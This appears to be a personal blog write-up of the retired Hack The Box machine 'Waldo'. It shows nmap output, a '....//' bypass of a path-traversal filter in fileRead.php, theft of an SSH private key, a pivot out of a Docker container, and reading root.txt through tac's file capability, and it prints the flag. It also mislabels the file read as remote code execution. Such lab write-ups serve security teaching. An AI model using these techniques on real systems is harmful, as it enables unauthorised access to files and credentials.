Waldo – Hackthebox.eu

Box just got retired. For the points it gets on HTB.eu, I found it quite challenging…

Enumeration

As always, nmap to get going:

sudo nmap -sC -sV -oA inital -p- 10.10.10.87
Starting Nmap 7.70 ( <a href="https://nmap.org" data-mce-href="https://nmap.org">https://nmap.org</a> ) at 2018-08-10 08:50 UTC
Nmap scan report for 10.10.10.87
Host is up (0.068s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
| 2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
| 256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
|_ 256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
| http-title: List Manager
|_Requested resource was /list.html
|_http-trane-info: Problem with XML parsing of /evox/about
8888/tcp filtered sun-answerbook

We got HTTP (80), SSH (22) and some weird sun-answerbook port (8888). Lets try browsing the site.

Looks like we need to find Waldo :). I initially got stuck here. Nothing seemed to work in terms of php, traversal’s, etc. Using Burp, I found out that there are 4 command’s that are issued on the site:

1. fileRead

2. fileWirte

3. fileDelete

4. dirRead

I really like this challenge, because I needed to start using Burp in ways I hadn’t before, as noted above. I then proceeded to look into what fileRead.php actually does:

K, so it reads files. No surprise there. Let’s see what happens if I use it to read the file itself:

Now I understand why the dir traversal didn’t work! The .php has a string that replaces …/ with ..\ and/or some other stuff.

$_POST['file'] = str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['file']);

Nifety! But not something you can work around with by using ….// instead of ..//. With ….//, one of the ../ be replaced, leaving just ../. See below!

Error… Now replace the ../ with ….//

Remote code execution! Awesome! Let’s see what we can do if we use the dirRead.php instead of fileRead.php

Cool, using this command I’ve did some reconnaisance of the box. I found that there is directory called .dockerenv, which must mean that the site is running in a Docker container.

On the the folder with the authorized keys. The .monitor file looks really interesting.

┬áMake sure to replace the \n, because they are actually invalid chars through the script. We have a .ssh key. Let’s see what we can do with it.

ssh -i monitor [email protected]
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.
waldo:~$ whoami
nobody


Exploitation

This is actually where I got stuck for a while. There are no strange services running, no sticky bits, no weird users, nothing. Then I realized that I am in Docker container. Maybe I can just use the key to login the localhost:

Hello Waldo!

Privilege escalation

Next up is to enumerate again. But first I need a shell I can use without restrictions. You can use -t to:

Force pseudo-terminal allocation. This can be used to execute
arbitrary screen-based programs on a remote machine, which can be
very useful, e.g. when implementing menu services. Multiple -t
options force tty allocation, even if ssh has no local tty.

So lets see if we can get an bash shell with this:

waldo:~$ ssh -i .ssh/.monitor [email protected] -t bash
[email protected]:~$

And again, I got stuck for quite a while after that. I’ve then send over LinEnum as described in the Hawk write-up. Initially it didn’t show up anything, until I ran the thorough version. After talking to some friends and colleagues, one of them pointed me at capabilities of files. I’ve honestly never heard of this up until that moment. However, this does not work out of the box with the shell I’ve got. I need to define all the PATH’s.

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

Most interesting part of the LinEnum.sh now is:

-e [+] Files with POSIX capabilities set:
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

After looking into tac,it seemed that I could use it to open root.txt.

[email protected]:/tmp$ /usr/bin/tac /root/root.txt

8fb67c84418be6e45fbd348fd4584f

Finally! Man, this was a hard box :). Learned so much, this is why I am doing these CTF’s.

ippsec video on this box